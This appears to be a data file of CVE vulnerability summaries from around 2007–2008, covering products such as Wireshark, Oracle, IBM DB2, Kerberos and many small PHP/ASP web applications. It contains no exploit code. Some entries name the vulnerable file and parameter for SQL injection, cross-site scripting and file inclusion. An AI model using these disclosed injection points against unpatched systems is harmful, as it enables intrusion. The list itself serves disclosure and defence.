Heap-based buffer overflow in w32rtr.exe in GE Fanuc CIMPLICITY HMI SCADA system 7.0 before 7.0 SIM 9, and earlier versions before 6.1 SP6 Hot fix - 010708_162517_6106, allow remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in glob in PHP before 4.4.8, when open_basedir is enabled, has unknown impact and attack vectors.  NOTE: this issue reportedly exists because of a regression related to CVE-2007-4663.
Cross-site scripting (XSS) vulnerability in login_form.asp in Instant Softwares Dating Site allows remote attackers to inject arbitrary web script or HTML via the msg parameter, a different product than CVE-2006-6022.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in login_form.asp in Instant Softwares Dating Site allows remote attackers to execute arbitrary SQL commands via the Username parameter, a different vulnerability than CVE-2007-6671.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL Server 7.0 SP4, 2000 SP4, 2005 SP1 and SP2, 2000 Desktop Engine (MSDE 2000) SP4, 2005 Express Edition SP1 and SP2, and 2000 Desktop Engine (WMSDE); Microsoft Data Engine (MSDE) 1.0 SP4; and Internal Database (WYukon) SP2 does not initialize memory pages when reallocating memory, which allows database operators to obtain sensitive information (database contents) via unknown vectors related to memory page reuse.
The (1) VBScript (VBScript.dll) and (2) JScript (JScript.dll) scripting engines 5.1 and 5.6, as used in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2, do not properly decode script, which allows remote attackers to execute arbitrary code via unknown vectors.
An ActiveX control (Messenger.UIAutomation.1) in Windows Messenger 4.7 and 5.1 is marked as safe-for-scripting, which allows remote attackers to control the Messenger application, and "change state," obtain contact information, and establish audio or video connections without notification via unknown vectors.
Unspecified vulnerability in Microsoft Internet Information Services (IIS) 5.0 through 7.0 allows local users to gain privileges via unknown vectors related to file change notifications in the TPRoot, NNTPFile\Root, or WWWRoot folders.
Unspecified vulnerability in AFP Server in Apple Mac OS X 10.4.11 allows remote attackers to bypass cross-realm authentication via unknown manipulations of Kerberos principal realm names.
Unspecified vulnerability in NFS in Apple Mac OS X 10.5 through 10.5.1 allows remote attackers to cause a denial of service (system shutdown) or execute arbitrary code via unknown vectors related to mbuf chains that trigger memory corruption.
Unspecified vulnerability in the Load method in the IPersistStreamInit interface in the Active Template Library (ATL), as used in the Microsoft Video ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via unknown vectors that trigger memory corruption, aka "ATL Header Memcopy Vulnerability," a different vulnerability than CVE-2008-0015.
Heap-based buffer overflow in an unspecified procedure in Trend Micro ServerProtect 5.7 and 5.58 allows remote attackers to execute arbitrary code via unknown vectors, possibly related to the product's configuration, a different vulnerability than CVE-2008-0012 and CVE-2008-0013.
Heap-based buffer overflow in an unspecified procedure in Trend Micro ServerProtect 5.7 and 5.58 allows remote attackers to execute arbitrary code via unknown vectors, possibly related to the product's configuration, a different vulnerability than CVE-2008-0012 and CVE-2008-0014.
Heap-based buffer overflow in an unspecified procedure in Trend Micro ServerProtect 5.7 and 5.58 allows remote attackers to execute arbitrary code via unknown vectors, possibly related to the product's configuration, a different vulnerability than CVE-2008-0013 and CVE-2008-0014.
Stack-based buffer overflow in the PAMBasicAuthenticator::PAMCallback function in OpenPegasus CIM management server (tog-pegasus), when compiled to use PAM and without PEGASUS_USE_PAM_STANDALONE_PROC defined, might allow remote attackers to execute arbitrary code via unknown vectors, a different vulnerability than CVE-2007-5360.
The Legion of the Bouncy Castle Java Cryptography API before release 1.38, as used in Crypto Provider Package before 1.36, has unknown impact and remote attack vectors related to "a Bleichenbacher vulnerability in simple RSA CMS signatures without signed attributes."
SQL injection vulnerability in Wiz-Ad 1.3 allows remote attackers to execute arbitrary SQL commands via unknown vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Flip4Mac WMV before 2.2.0.49 has unknown impact and attack vectors related to malformed WMV files.
Unspecified vulnerability in customer.php in FreeWebshop.org 2.2.5, 2.2.6 and 2.2.7WIP1/2 allows remote attackers to gain administrator privileges via unknown vectors.
The chrp_show_cpuinfo function (chrp/setup.c) in Linux kernel 2.4.21 through 2.6.18-53, when running on PowerPC, might allow local users to cause a denial of service (crash) via unknown vectors that cause the of_get_property function to fail, which triggers a NULL pointer dereference.
Unspecified vulnerability in the WebCam module in Menalto Gallery before 2.2.4 has unknown impact and attack vectors related to a "proxied request."
Multiple unspecified vulnerabilities in Menalto Gallery before 2.2.4 have unknown impact, related to (1) "hotlink protection" in the URL rewrite module, (2) a WebDAV view in the WebDAV module, (3) a comment view in the Comment module, (4) unspecified "item information disclosure attacks" in the Core module Gallery application, (5) the slideshow in the Slideshow module, and (6) multiple Print modules.
The Gallery Remote module in Menalto Gallery before 2.2.4 does not check permissions for unspecified GR commands, which has unknown impact and attack vectors.
Unspecified vulnerability in the Installation application in Menalto Gallery before 2.2.4 has unknown impact and attack vectors related to "web-accessibility protection of the storage folder."
The URL rewrite module in Menalto Gallery before 2.2.4 allows attackers to include and execute arbitrary local files via unknown vectors related to the admin controller.
Unspecified vulnerability in the Publish XP module Menalto Gallery before 2.2.4 allows attackers to create albums and upload files via unknown vectors.
Unspecified vulnerability in the Administrative Console in IBM WebSphere Application Server 6.1 before Fix Pack 13 has unknown impact and attack vectors, related to "security concerns with monitor role users."  NOTE: it was later reported that 6.0.2 before Fix Pack 25 is also affected.
Cross-site scripting (XSS) vulnerability in PHCDownload 1.10 allows remote attackers to inject arbitrary web script or HTML via the username field in an unspecified component.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in RunCMS before 1.6.1 has unknown impact and attack vectors, related to "pagetype using."
Double free vulnerability in the Widget Library (libxfcegui4) in Xfce before 4.4.2 might allow remote attackers to execute arbitrary code via unknown vectors related to the "cliend id, program name and working directory in session management."
Multiple unspecified vulnerabilities in TikiWiki before 1.9.9 have unknown impact and attack vectors involving (1) tiki-edit_css.php, (2) tiki-list_games.php, or (3) tiki-g-admin_shared_source.php.
Unspecified vulnerability in eClient in IBM DB2 Content Manager (CM) Toolkit 8.3 before fix pack 7 for z/OS has unknown impact and attack vectors, related to "scripting."
Opera before 9.25 allows remote attackers to conduct cross-domain scripting attacks via unknown vectors related to plug-ins.
Multiple stack-based buffer overflows in ProWizard 4 PC (prowiz) 1.62 and earlier allow remote attackers to execute arbitrary code via a crafted file to the (1) AMOS-MusicBank, (2) FuzzacPacker, and (3) QuadraComposer rippers; and (4) have an unknown impact via a crafted file to the SkytPacker ripper.
SQL injection vulnerability in index.php in phpRPG 0.8 allows remote attackers to execute arbitrary SQL commands via the password parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in OpenOffice.org code in Planamesa NeoOffice 2.2.2 before Patch 4 has unknown impact and attack vectors related to MacOS 10.3.9 .odb files.  NOTE: it is not clear whether this issue is a vulnerability.
Unspecified vulnerability in the benchmark reporting system in Google Web Toolkit (GWT) before 1.4.61 has unknown impact and attack vectors, possibly related to cross-site scripting (XSS).
Unspecified vulnerability in the CIP dissector in Wireshark (formerly Ethereal) 0.9.14 to 0.99.6 allows remote attackers to cause a denial of service (crash) via unknown vectors that trigger allocation of large amounts of memory.
The RPL dissector in Wireshark (formerly Ethereal) 0.9.8 to 0.99.6 allows remote attackers to cause a denial of service (infinite loop) via unknown vectors.
The WiMAX dissector in Wireshark (formerly Ethereal) 0.99.6 allows remote attackers to cause a denial of service (crash) via unknown vectors related to "unaligned access on some platforms."
Unspecified vulnerability in the SMB dissector in Wireshark (formerly Ethereal) 0.99.6 allows remote attackers to cause a denial of service via unknown vectors. NOTE: this identifier originally included MP3 and NCP, but those issues are already covered by CVE-2007-6111.
Unspecified vulnerability in HP-UX B.11.31, when running ARPA Transport, allows remote attackers to cause a denial of service via unknown vectors.
The proxy server in Kerio WinRoute Firewall before 6.4.1 does not properly enforce authentication for HTTPS pages, which has unknown impact and attack vectors.  NOTE: it is not clear whether this issue crosses privilege boundaries.
Directory traversal vulnerability in autohtml.php in Francisco Burzi PHP-Nuke 8.0 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the filename parameter, a different vector than CVE-2006-4190.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in modules/ecal/display.php in the Event Calendar in bcoos 1.0.10 allows remote attackers to inject arbitrary web script or HTML via the month parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  NOTE: the day and year vectors are covered by CVE-2007-6274.
Integer overflow in exiftags before 1.01 has unknown impact and attack vectors, resulting from a "field offset overflow" that triggers an "illegal memory access," a different vulnerability than CVE-2007-6354.
Unspecified vulnerability in exiftags before 1.01 has unknown impact and attack vectors, resulting from a "field offset overflow" that triggers an "illegal memory access," a different vulnerability than CVE-2007-6355.
Unspecified vulnerability in the bzip2 decompression algorithm in nsis/bzlib_private.h in ClamAV before 0.92 has unknown impact and remote attack vectors.
Multiple unspecified vulnerabilities in Lyris ListManager 8.x before 8.95d, 9.2 before 9.2c, and 9.3 before 9.3b allow remote attackers to (1) gain list administrator privileges or (2) access arbitrary mailing lists via unknown vectors related to modification of client-side information; and (3) allow remote authenticated administrators to modify other account data by creating "new accounts that collide with existing accounts."
Cross-site scripting (XSS) vulnerability in the login page in Lxlabs HyperVM 2.0 allows remote attackers to inject arbitrary web script or HTML via the frm_emessage parameter, a different vector than CVE-2006-6649.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in avast! 4 Home and Professional Editions before 4.7.1098 allows remote attackers to have an unknown impact via a crafted TAR archive.
Multiple buffer overflows in Adobe Form Designer 5.0 and Form Client 5.0 allow remote attackers to execute arbitrary code via unknown vectors in the (1) Adobe File Dialog Button (FileDlg.dll) and the (2) Adobe Copy to Server Object (SvrCopy.dll) ActiveX controls.
Unspecified vulnerability in Adobe Flash Player 9.0.48.0 and earlier might allow remote attackers to execute arbitrary code via unknown vectors, related to "input validation errors."
Multiple unspecified vulnerabilities in Beehive Forum 0.7.1 have unknown "critical" impact and attack vectors, different issues than CVE-2007-6014.
The "cache update reply processing" functionality in Squid 2.x before 2.6.STABLE17 and Squid 3.0 allows remote attackers to cause a denial of service (crash) via unknown vectors related to HTTP headers and an Array memory leak during requests for cached objects.
Unspecified vulnerability in Apple QuickTime 7.2 on Windows XP allows remote attackers to execute arbitrary code via unknown attack vectors, probably a different vulnerability than CVE-2007-6166.  NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release advisories with actionable information.  A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine.  However, the organization has stated that this is different than CVE-2007-6166.
TuMusika Evolution 1.7R5 allows remote attackers to obtain configuration information via a direct request to phpinfo.php, which calls the phpinfo function.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Wesnoth 1.2.x before 1.2.8, and 1.3.x before 1.3.12, allows attackers to cause a denial of service (hang) via a "faulty add-on" and possibly execute other commands via unknown vectors related to the turn_cmd option.
rsync before 3.0.0pre6, when running a writable rsync daemon that is not using chroot, allows remote attackers to access restricted files via unknown vectors that cause rsync to create a symlink that points outside of the module's hierarchy.
Unspecified vulnerability in HP Select Identity 4.01 before 4.01.012 and 4.1x before 4.13.003 allows remote attackers to obtain unspecified access via unknown vectors.
Unspecified vulnerability in PHPDevShell before 0.7.0 has unknown impact and attack vectors, involving a "minor security bug in repair &amp; optimize database."
SQL injection vulnerability in the Postgres Realtime Engine (res_config_pgsql) in Asterisk 1.4.x before 1.4.15 and C.x before C.1.0-beta6 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
SQL injection vulnerability in admin/index2.asp in GOUAE DWD Realty allows remote attackers to execute arbitrary SQL commands via the uname parameter, a different vector than CVE-2007-6163.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in default.asp in VU Case Manager allows remote attackers to execute arbitrary SQL commands via the username parameter, a different vector than CVE-2007-6143.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in ph03y3nk just another flat file (JAF) CMS 4.0 RC2 allow remote attackers to inject arbitrary web script or HTML via the (1) show parameter to index.php and the (2) print parameter to print.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in IRC Services 5.1.8 has unknown impact and attack vectors.
The Bluetooth SDP dissector Wireshark (formerly Ethereal) 0.99.2 to 0.99.6 allows remote attackers to cause a denial of service (infinite loop) via unknown vectors.
The DCP ETSI dissector in Wireshark (formerly Ethereal) 0.99.6 allows remote attackers to cause a denial of service (long loop and resource consumption) via unknown vectors.
The MEGACO dissector in Wireshark (formerly Ethereal) 0.9.14 to 0.99.6 allows remote attackers to cause a denial of service (long loop and resource consumption) via unknown vectors.
The Firebird/Interbase dissector in Wireshark (formerly Ethereal) 0.99.6 allows remote attackers to cause a denial of service (infinite loop or crash) via unknown vectors.
Buffer overflow in the ANSI MAP dissector for Wireshark (formerly Ethereal) 0.99.5 to 0.99.6, when running on unspecified platforms, allows remote attackers to cause a denial of service and possibly execute arbitrary code via unknown vectors.
Buffer overflow in the PPP dissector Wireshark (formerly Ethereal) 0.99.6 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors.
Ingate Firewall before 4.6.0 and SIParator before 4.6.0 do not log truncated (1) ICMP, (2) UDP, and (3) TCP packets, which has unknown impact and remote attack vectors; and do not log (4) serial-console login attempts with nonexistent usernames, which might make it easier for attackers with physical access to guess valid login credentials while avoiding detection.
Unspecified vulnerability in the ICMP implementation in Ingate Firewall before 4.6.0 and SIParator before 4.6.0 has unknown impact and remote attack vectors, related to ICMP packets that are "incorrectly accepted."
Ingate Firewall before 4.6.0 and SIParator before 4.6.0 use cleartext storage for passwords of "administrators with less privileges," which might allow attackers to read these passwords via unknown vectors.
Buffer overflow in libsrtp in Ingate Firewall before 4.6.0 and SIParator before 4.6.0 has unknown impact and attack vectors.  NOTE: it is not clear whether this issue crosses privilege boundaries.
Cross-site scripting (XSS) vulnerability in index.php in Nuked-Klan 1.7.5 allows remote attackers to inject arbitrary web script or HTML via the file parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Buffer overflow in the isdn_net_setcfg function in isdn_net.c in Linux kernel 2.6.23 allows local users to have an unknown impact via a crafted argument to the isdn_ioctl function.
IBM DB2 UDB 9.1 before Fixpak 4 does not properly handle use of large numbers of file descriptors, which might allow attackers to have an unknown impact involving "memory corruption." NOTE: the vendor description of this issue is too vague to be certain that it is security-related.
IBM DB2 UDB 9.1 before Fixpak 4 assigns incorrect privileges to the (1) DB2ADMNS and (2) DB2USERS alternative groups, which has unknown impact.  NOTE: the vendor description of this issue is too vague to be certain that it is security-related.
Unspecified vulnerability in DB2LICD in IBM DB2 UDB 9.1 before Fixpak 4 has unknown impact and attack vectors, related to creation of an "insecure directory."
Unspecified vulnerability in the SSL LOAD GSKIT action in IBM DB2 UDB 9.1 before Fixpak 4 has unknown impact and attack vectors, involving a call to dlopen when the effective uid is root.
IBM DB2 UDB 9.1 before Fixpak 4 uses incorrect permissions on ACLs for DB2NODES.CFG, which has unknown impact and attack vectors.  NOTE: the vendor description of this issue is too vague to be certain that it is security-related.
Unspecified vulnerability in unspecified setuid programs in IBM DB2 UDB 9.1 before Fixpak 4 allows local users to have an unknown impact.
Unspecified vulnerability in (1) DB2WATCH and (2) DB2FREEZE in IBM DB2 UDB 9.1 before Fixpak 4 has unknown impact and attack vectors.
Multiple unspecified vulnerabilities in IBM WebSphere MQ 6.0 have unknown impact and remote attack vectors involving "memory corruption." NOTE: as of 20071116, the only disclosure is a vague pre-advisory with no actionable information. However, since it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes.
PHP remote file inclusion vulnerability in fehler.inc.php in SWSoft Confixx Professional 3.2.1 allows remote attackers to execute arbitrary PHP code via a URL in an unspecified parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Weird Solutions BOOTPTurbo 1.2 has unknown impact and remote attack vectors.  NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine.
Unspecified vulnerability in main.php of BugHotel Reservation System before 4.9.9 P3 allows remote attackers to bypass authentication and gain administrative access via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Heap-based buffer overflow in emlsr.dll before 2.0.0.4 in Autonomy (formerly Verity) KeyView Viewer, Filter, and Export SDK allows remote attackers to execute arbitrary code via a long Content-Type header line in an EML file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
TestLink before 1.7.1 does not enforce an unspecified authorization mechanism, which has unknown impact and attack vectors.
Cross-site scripting (XSS) vulnerability in cgi/b/ic/connect in the Thomson SpeedTouch 716 with firmware 5.4.0.14 allows remote attackers to inject arbitrary web script or HTML via the url parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Lantronix SCS3200 does not properly handle public-key requests, which allows remote attackers to cause a denial of service (unresponsive device) via unspecified keyscan requests.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Double free vulnerability in the krb5_def_store_mkey function in lib/kdb/kdb_default.c in MIT Kerberos 5 (krb5) 1.5 has unknown impact and remote authenticated attack vectors.  NOTE: the free operations occur in code that stores the krb5kdc master key, and so the attacker must have privileges to store this key.
Double free vulnerability in the gss_krb5int_make_seal_token_v3 function in lib/gssapi/krb5/k5sealv3.c in MIT Kerberos 5 (krb5) has unknown impact and attack vectors.
Unspecified vulnerability in kdebase allows local users to cause a denial of service (KDM login inaccessible, or resource consumption) via unknown vectors.
Cross-site scripting (XSS) vulnerability in the Red Hat Network channel search feature, as used in RHN and Red Hat Network Satellite before 5.0.2, allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Multiple unspecified vulnerabilities in Mozilla Firefox before 2.0.0.10 and SeaMonkey before 1.1.7 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors that trigger memory corruption.
Cross-site scripting (XSS) vulnerability in buscador.php in JLMForo System allows remote attackers to inject arbitrary web script or HTML via the clave parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in admin/index.php in Helios Calendar 1.2.1 Beta allows remote attackers to inject arbitrary web script or HTML via the username parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The gss_userok function in appl/ftp/ftpd/gss_userok.c in Heimdal 0.7.2 does not allocate memory for the ticketfile pointer before calling free, which allows remote attackers to have an unknown impact via an invalid username.  NOTE: the vulnerability was originally reported for ftpd.c, but this is incorrect.
The reDirect function in lib/controllers/RepViewController.php in OrangeHRM before 2.2.2 does not verify the privileges of a user, which allows remote attackers to obtain access to data via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The convert_search_mode_to_innobase function in ha_innodb.cc in the InnoDB engine in MySQL 5.1.23-BK and earlier allows remote authenticated users to cause a denial of service (database crash) via a certain CONTAINS operation on an indexed column, which triggers an assertion error.
Integer overflow in the svcauth_gss_get_principal function in lib/rpc/svc_auth_gss.c in MIT Kerberos 5 (krb5) allows remote attackers to have an unknown impact via a large length value for a GSS client name in an RPC request.
Use-after-free vulnerability in the gss_indicate_mechs function in lib/gssapi/mechglue/g_initialize.c in MIT Kerberos 5 (krb5) has unknown impact and attack vectors.  NOTE: this might be the result of a typo in the source code.
The (1) htmlentities and (2) htmlspecialchars functions in PHP before 5.2.5 accept partial multibyte sequences, which has unknown impact and attack vectors, a different issue than CVE-2006-5465.
** DISPUTED **
Multiple cross-site scripting (XSS) vulnerabilities in jsp/Login.do in ManageEngine OpManager MSP Edition and OpManager 7.0 allow remote attackers to inject arbitrary web script or HTML via the (1) requestid, (2) fileid, (3) woMode, and (2) woID parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in index.php in easyGB 2.1.1 allows remote attackers to include arbitrary files via the DatabaseType parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
iChat in Apple Mac OS X 10.4.11 allows network-adjacent remote attackers to automatically initiate a video connection to another user via unknown vectors.
SQL injection vulnerability in Amazing Flash AFCommerce allows remote attackers to execute arbitrary SQL commands via the firstname parameter to an unspecified component, a different issue than CVE-2006-3794.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Buffer overflow in the register function in Ultra Star Reader ActiveX control in SSReader allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in WORK system e-commerce before 4.0.2 has unknown impact and attack vectors related to "Ajax pages."
SQL injection vulnerability in okxLOV.jsp in Oracle E-Business Suite 11 and 12 allows remote attackers to execute arbitrary SQL commands via unknown vectors.  NOTE: this is probably the same issue as CVE-2007-5527 or CVE-2007-5528, but there are insufficient details to be sure.
Unspecified vulnerability in Light FMan PHP (lfman or lightfman) before 2.0rc1 has unknown impact and attack vectors related to "actions."
Directory traversal vulnerability in the WML engine preprocessor for Wesnoth 1.2.x before 1.2.8, and 1.3.x before 1.3.12, allows remote attackers to read arbitrary files via ".." sequences in unknown vectors.
slapo-pcache (overlays/pcache.c) in slapd in OpenLDAP before 2.3.39, when running as a proxy-caching server, allocates memory using a malloc variant instead of calloc, which prevents an array from being initialized properly and might allow attackers to cause a denial of service (segmentation fault) via unknown vectors that prevent the array from being null terminated.
Unspecified vulnerability in the Settings component in the administration system in Jeebles Directory 2.9.60 allows remote authenticated administrators to execute arbitrary PHP code via unspecified vectors related to settings.inc.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in default.asp in CREApark GOLD KOY PORTALI allows remote attackers to inject arbitrary web script or HTML via the aranan parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in Salford Software Support Incident Tracker (SiT!) before 3.30 have unknown impact and attack vectors.
Cross-site scripting (XSS) vulnerability in admin/logon.asp in ShoppingTree CandyPress Store 4.1 allows remote attackers to inject arbitrary web script or HTML via the msg parameter, a different vector than CVE-2007-2804.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in Nagios 2.x before 2.10 allows remote attackers to inject arbitrary web script or HTML via unknown vectors to unspecified CGI scripts.
Cross-site request forgery (CSRF) vulnerability in 1024 CMS 1.2.5 allows remote attackers to perform some actions as administrators, as demonstrated by (1) an unspecified action that creates a file containing PHP code and (2) unspecified use of the forum component. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Symantec Altiris Deployment Solution allows attackers to obtain authentication credentials via unknown vectors, aka "Authentication Credentials Information Leakage in Altiris Deployment Solution."  NOTE: this description is based on a vague pre-advisory with no actionable information. However, since it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes.
Unspecified vulnerability in Opera before 9.24, when using an "external" newsgroup or e-mail client, allows remote attackers to execute arbitrary commands via unknown vectors.
Unspecified vulnerability in Opera before 9.24 allows remote attackers to overwrite functions on pages from other domains and bypass the same-origin policy via unknown vectors.
Unspecified vulnerability in newbb_plus in RunCms 1.5.2 has unknown impact and attack vectors.
Unspecified vulnerability in the HCM component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.9 Bundle 13 9.0 Bundle 3 has unknown impact and remote attack vectors, aka PSE_HCM01.
Unspecified vulnerability in the People Tools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.47.14, 8.48.13, 8.49.05 has unknown impact and remote attack vectors, aka PSE02.
Unspecified vulnerability in the People Tools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.22.17, 8.47.14, 8.48.13, 8.49.05 has unknown impact and remote attack vectors, aka PSE01.
Unspecified vulnerability in Oracle Help for Web, as used in Oracle Application Server, Oracle Database 10.2.0.3, and Enterprise Manager 10.1.0.6, has unknown impact and remote attack vectors, aka EM02.
Unspecified vulnerability in the Database Control component in Oracle Database 10.1.0.5 and 10.2.0.3, and Enterprise Manager, has unknown impact and remote attack vectors, aka EM01.
Unspecified vulnerability in the Oracle Self-Service Web Applications component in client-only installations of Oracle E-Business Suite 11.5.10.2 has unknown impact and remote attack vectors, aka APP08.
Multiple unspecified vulnerabilities in Oracle E-Business Suite 12.0.2 have unknown impact and attack vectors related to (1) Public Sector Human Resources (APP03) and (2) Quoting component (APP06).
Multiple unspecified vulnerabilities in Oracle E-Business Suite 11.5.10.2 have unknown impact and remote attack vectors, related to (1) Application Object Library component (APP01), (2) Contracts Integration (APP02), (3) Applications Manager (APP04), (4) Marketing component (APP05), and (5) Exchange component (APP07).
Unspecified vulnerability in the Oracle Portal component in Oracle Application Server 10.1.2.0.2, 10.1.2.2, and 10.1.4.1, and Collaboration Suite 10.1.2, has unknown impact and remote attack vectors, aka AS11.
Unspecified vulnerability in the Oracle Single Sign-On component in Oracle Application Server 9.0.4.3, 10.1.2.0.2, 10.1.2.2, and 10.1.4.0.1; Collaboration Suite 10.1.2; and Enterprise Manager 10.1.2 has unknown impact and remote attack vectors, aka AS10.
Unspecified vulnerability in the Oracle Single Sign-On component in Oracle Application Server 9.0.4.3, 10.1.2.0.2, and 10.1.2.2, and Collaboration Suite 10.1.2, has unknown impact and remote attack vectors, aka AS09 or AS9.
Unspecified vulnerability in the Oracle Internet Directory component in Oracle Application Server 9.0.4.3, 10.1.2.0.2, 10.1.2.2, and 10.1.4.0, and Collaboration Suite 10.1.2, has unknown impact and remote attack vectors, aka AS08.
Unspecified vulnerability in the Oracle Portal component in Oracle Application Server 10.1.4.1 has unknown impact and remote attack vectors, aka AS07.
Unspecified vulnerability in the Oracle Containers for J2EE component in Oracle Application Server 9.0.4.3, 10.1.2.0.2, 10.1.2.2, and 10.1.3.3, and Collaboration Suite 10.1.2, has unknown impact and remote attack vectors, aka AS06.
Unspecified vulnerability in the Oracle Internet Directory component in Oracle Database 9.2.0.8 and 9.2.0.8DV, and Oracle Application Server 9.0.4.3, 10.1.3.0.0 up to 10.1.3.3.0, and 10.1.2.0.1 up to 10.1.2.2.0, has unknown impact and remote attack vectors, aka AS05.
Unspecified vulnerability in the Oracle Portal component in Oracle Application Server 9.0.4.3 and 10.1.2.0.2, and Collaboration Suite 10.1.2, has unknown impact and remote attack vectors, aka AS04.
Unspecified vulnerability in the Oracle HTTP Server component in Oracle Application Server 10.1.3.2 has unknown impact and remote attack vectors, aka AS03.
Unspecified vulnerability in the Oracle Portal component in Oracle Application Server 10.1.2.0.2 and 10.1.4.1, and Collaboration Suite 10.1.2, has unknown impact and remote attack vectors, aka AS02.
Unspecified vulnerability in the Oracle Process Mgmt &amp; Notification component in Oracle Application Server 10.1.3.3 has unknown impact and remote attack vectors, aka AS01.
Unspecified vulnerability in the Spatial component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.2, and 10.2.0.3 has unknown impact and remote attack vectors, aka DB27.
Multiple unspecified vulnerabilities in Oracle Database 10.2.0.3 have unknown impact and attack vectors related to (1) Database Vault component (DB24) and (2) SQL Execution component (DB26).
Unspecified vulnerability in the Oracle Database Vault component in Oracle Database 9.2.0.8DV and 10.2.0.3 has unknown impact and remote attack vectors, aka DB21.
Multiple unspecified vulnerabilities in the Workspace Manager component in Oracle Database before OWM 10.2.0.4.1, OWM 10.1.0.8.0, and OWM 9.2.0.8.0 have unknown impact and remote attack vectors, aka (1) DB08, (2) DB09, (3) DB10, (4) DB11, (5) DB12, (6) DB13, (7) DB14, (8) DB15, (9) DB16, (10) DB17, and (11) DB18.  NOTE: one of these issues is probably CVE-2007-5511, but there are insufficient details to be certain.
Unspecified vulnerability in the Spatial component in Oracle Database 9.2.0.8 and 9.2.0.8DV has unknown impact and remote attack vectors, aka DB06.
Multiple unspecified vulnerabilities in Oracle Database 9.0.1.5+, 9.2.0.8, 9.2.0.8DV, 10.1.0.5, and 10.2.0.3 have unknown impact and remote attack vectors, related to (1) the Export component (DB02), (2) Oracle Text (DB04), (3) Oracle Text (DB05), (4) Spatial component (DB07), and (5) Advanced Security Option (DB19).
Multiple unspecified vulnerabilities in Oracle Database 9.0.1.5+ and 10.1.0.5 unknown impact and remote attack vectors, related to (1) Import (DB01) and (2) Advanced Queuing (DB25).  NOTE: as of 20071108, Oracle has not disputed reliable researcher claims that DB25 is for a buffer overflow in the DBLINK_INFO procedure in the DBMS_AQADM_SYS package.
Unspecified vulnerability in the Administrative Scripting Tools (such as wsadmin or ANT) in IBM WebSphere Application Server 5.x and 6.0.x has unknown impact and attack vectors.
Unspecified vulnerability in Adobe Flash Player 9.0.47.0 and earlier, when running on Opera before 9.24 on Mac OS X, has unknown "Highly Severe" impact and unknown attack vectors.
Multiple buffer overflows in eXtremail 2.1.1 and earlier allow remote attackers to (1) have an unknown impact by sending multiple long strings to the IMAP port (143/tcp); (2) execute arbitrary code via a long string in an IMAP AUTHENTICATE PLAIN action, involving the ifParseAuthPlain function; (3) execute arbitrary code via a long LOGIN command to the admin interface port (4501/tcp); or (4) execute arbitrary code via a long string in an IMAP AUTHENTICATE LOGIN (aka CRAM-MD5 authentication) action, involving the ifProcImapAuth1 function.
CMS Made Simple 1.1.3.1 does not check the permissions assigned to users who attempt uploads, which allows remote authenticated users to upload unspecified files via unknown vectors.
Unspecified vulnerability in HP Select Identity 4.01 through 4.01.010 and 4.10 through 4.13.001 allows remote attackers to obtain unspecified access via unknown vectors.
** DISPUTED **
